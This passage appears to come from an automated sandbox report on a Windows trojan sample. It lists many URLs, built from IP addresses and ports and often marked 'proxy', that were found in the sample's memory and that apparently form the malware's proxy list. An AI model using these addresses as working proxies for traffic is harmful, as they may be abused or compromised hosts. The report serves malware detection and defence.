                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.18.60.191:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.19.111.185
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.19.111.185://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.19.111.185:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCBAD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.197.178.186:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.197.178.186:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA660000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.206.186.87:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.206.186.87:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.215.176.36:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.215.176.36:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.215.177.53:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.215.177.53:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.215.177.57:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.215.177.57:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.247.47.108:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.247.47.108:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.247.47.184:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.247.47.184:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.247.47.239:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.247.47.239:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.247.47.65:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.247.47.65:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.27.144.51
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.27.144.51://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.27.144.51:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.105.170.35:21555
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.105.170.35:21555://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.108.42.154:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.108.42.154:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.108.42.79:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.108.42.79:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.122.184.9:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.122.184.9:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.132.48.1:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.132.48.1:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E1A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.152.40.14:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.152.40.14:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.152.40.15:5050
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.152.40.15:5050://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.19.244.109:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.19.244.109:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.225.72.125:3503
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.225.72.125:3503://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.226.4.102
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.226.4.102://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.226.4.102:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.227.193.172:2001
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.227.193.172:2001://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C90FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.227.38.198
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.227.38.198://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.227.38.198:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.227.38.230
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.227.38.230://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.227.38.230:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.254.231.55
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.254.231.55://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.254.231.55:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.81.127.247:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.81.127.247:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C906D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.92.223.122:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C90C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.92.223.122:3128p
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E05000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.50.198:15673
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.50.198:15673://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.216.90:15673
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.216.90:15673://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.106.221.23:53281
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.106.221.23:53281://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.144.87.187:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.144.87.187:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6C9D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.152.50.116:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.152.50.116:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.172.34.114:49920
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.172.34.114:49920://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.172.82.94:53281
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.172.82.94:53281://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.172.82.94:53281x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.192.227.234:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.192.227.234:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.199.86.181:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.199.86.181:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.205.201.186
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.205.201.186://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.230.33.96:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.230.33.96:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.249.199.12:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.249.199.12:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.249.199.4:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.249.199.4:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8267000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.37.245.42:51056
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.37.245.42:51056://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.111.83.204:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.111.83.204:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF23000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.111.83.207:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.111.83.207:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.112.70.155:8083
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.112.70.155:8083://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.112.70.59:1111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.112.70.59:1111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.112.78.34:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.112.78.34:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.123.1.33:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.123.1.33:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8FA3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.123.1.36:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.123.1.36:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.123.3.141:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.123.3.141:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.133.238.94
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.133.238.94://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.133.238.94:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.131.122:8090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.131.122:8090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.137.90:8090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.137.90:8090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.139.154:8090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.139.154:8090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.140.5:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.140.5:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.24.205:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.24.205:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7883000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.241.134:10800
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.241.134:10800://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.254.104.130:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.254.104.130:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.65.116.243:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA61A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.65.116.243:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.65.116.243:1080x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.65.240.157:1080
